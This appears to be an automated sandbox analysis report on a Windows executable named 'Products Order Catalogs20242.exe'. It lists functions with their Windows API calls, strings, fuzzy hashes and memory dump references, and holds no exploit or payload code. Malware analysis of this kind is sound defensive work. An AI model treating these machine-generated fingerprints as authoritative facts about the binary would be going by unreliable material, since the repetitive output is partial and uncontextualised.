                                                                                                • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                                • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                                • GetParent.USER32 ref: 0046949E
                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                                • GetParent.USER32 ref: 004694C1
                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 2040099840-1403004172
                                                                                                • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                                                • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                                                APIs
                                                                                                  • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                                                • SendMessageW.USER32(75C123D0,00001001,00000000,00000000), ref: 00448E73
                                                                                                • SendMessageW.USER32(75C123D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                                  • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                • String ID:
                                                                                                • API String ID: 3771399671-0
                                                                                                • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                                                • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 3413494760-0
                                                                                                • Opcode ID: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                                                                                • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                                                • Opcode Fuzzy Hash: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                                                                                • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                                • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                • String ID:
                                                                                                • API String ID: 2156557900-0
                                                                                                • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                                                • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll
                                                                                                • String ID: 0%d$DOWN$OFF
                                                                                                • API String ID: 3832890014-468733193
                                                                                                • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                                                • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                                                APIs
                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                                                • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                                                • VariantClear.OLEAUT32 ref: 0045E970
                                                                                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                                                • __swprintf.LIBCMT ref: 0045EB1F
                                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                                                Strings
                                                                                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                                                • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                • API String ID: 43541914-1568723262
                                                                                                • Opcode ID: 37b26c3e130c1a31af09048bf95897f87bf3bde4777f47a21ee6b10bd43e23e8
                                                                                                • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                                                • Opcode Fuzzy Hash: 37b26c3e130c1a31af09048bf95897f87bf3bde4777f47a21ee6b10bd43e23e8
                                                                                                • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                                                • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                                                • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked$Sleep
                                                                                                • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                                                • API String ID: 2250217261-3412429629
                                                                                                • Opcode ID: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                                                • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                                                • Opcode Fuzzy Hash: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                                                • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                • API String ID: 0-1603158881
                                                                                                • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                                • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 00479D1F
                                                                                                • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                                • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                                • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                                  • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                                  • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                                  • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                                • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                                  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                                • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                • API String ID: 665237470-60002521
                                                                                                • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                                • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConnectRegistry_wcslen
                                                                                                • String ID: HH
                                                                                                • API String ID: 535477410-2761332787
                                                                                                • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                                                • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0045F317
                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                                • IsMenu.USER32(?), ref: 0045F380
                                                                                                • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                                • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                                • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                • String ID: 0$2
                                                                                                • API String ID: 3311875123-3793063076
                                                                                                • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                                • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\Products Order Catalogs20242.exe), ref: 0043719E
                                                                                                • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                                • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                                • _printf.LIBCMT ref: 004371EC
                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                                Strings
                                                                                                • C:\Users\user\Desktop\Products Order Catalogs20242.exe, xrefs: 00437189
                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleLoadModuleString$Message_printf
                                                                                                • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Products Order Catalogs20242.exe
                                                                                                • API String ID: 220974073-3574983964
                                                                                                • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                                • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                                • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                                APIs
                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Products Order Catalogs20242.exe,?,C:\Users\user\Desktop\Products Order Catalogs20242.exe,004A8E80,C:\Users\user\Desktop\Products Order Catalogs20242.exe,0040F3D2), ref: 0040FFCA
                                                                                                  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 978794511-0
                                                                                                • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                                • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                                • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                                APIs
                                                                                                  • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                                  • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                                  • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
